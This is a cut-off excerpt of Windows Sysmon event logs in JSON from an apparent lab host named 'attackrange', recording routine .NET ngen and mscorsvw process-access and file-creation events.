{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6649,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.023\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-0010BF4C0A00}\r\nTargetProcessId: 4248\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.023","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-0010BF4C0A00}","TargetProcessId":"4248","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6650,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.070\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-00102C500A00}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.070","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-00102C500A00}","TargetProcessId":"4656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6651,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-00102C500A00}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-00102C500A00}","TargetProcessId":"4656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6652,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-00102C500A00}\r\nTargetProcessId: 4656\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-00102C500A00}","TargetProcessId":"4656","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6653,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:03:59.195\r\nProcessGuid: {41C8662E-21EF-5F25-0000-00102C500A00}\r\nProcessId: 4656\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1230-0\\System.ServiceProcess.dll\r\nCreationUtcTime: 2020-08-01 08:03:59.195","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:03:59.195","ProcessGuid":"{41C8662E-21EF-5F25-0000-00102C500A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1230-0\\System.ServiceProcess.dll","CreationUtcTime":"2020-08-01 08:03:59.195","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6654,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.226\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-0010ED530A00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.226","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-0010ED530A00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6655,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.226\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-0010ED530A00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.226","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-0010ED530A00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6656,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.242\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-0010ED530A00}\r\nTargetProcessId: 4092\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:59.242","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21EF-5F25-0000-0010ED530A00}","TargetProcessId":"4092","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6657,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:59.320\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21EF-5F25-0000-00104D570A00}\r\nTargetProcessId: 4976\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 